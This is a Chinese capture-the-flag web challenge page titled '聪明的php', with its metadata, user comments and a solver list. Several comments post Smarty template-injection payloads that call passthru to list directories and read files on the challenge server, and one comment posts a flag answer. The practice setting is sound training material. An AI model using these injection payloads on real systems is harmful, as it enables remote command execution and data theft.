聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 3483
提  示:
描  述:
聪明的php
评论
人闲桂花落 3天前

tac命令读取也可

回复 0

docker0w 10月前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 2

bx33661 11月前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 11月前

?key={{passthru('ls /')}}

回复 0

xinkuang 1年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

YUMEKO 1年前

http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了

回复 0

Daniel2023 1年前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 1年前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

EtHat 1年前

index.php?a={passthru("tac /_4060")}

回复 0
FUCK123 1年前

fnmdp

回复 0

18904484271 1年前

好垃圾的靶场,明明flag出来了,但是提交显示不正确

回复 1

WriteUp

image
midi

3 金币

评分(13)

解题动态

123456abc 攻破了该题 1天前
souljian03 攻破了该题 2天前
hackerbugku 攻破了该题 2天前
人闲桂花落 攻破了该题 3天前
小白ctf 攻破了该题 6天前
femsq 攻破了该题 7天前
千机www 攻破了该题 9天前
Da1ly_1upup 攻破了该题 11天前
华仔 攻破了该题 12天前
ETERNALBLUE 攻破了该题 13天前
13945024799 攻破了该题 13天前
李欣 攻破了该题 14天前
124要留就要77 攻破了该题 14天前
abcfdafda123 攻破了该题 14天前
ahsjezyt 攻破了该题 15天前
ccttffwwyy 攻破了该题 19天前
123zp 攻破了该题 20天前
萝卜兔 攻破了该题 21天前
2424291112 攻破了该题 21天前
ZZZZZZYx 攻破了该题 22天前
问题反馈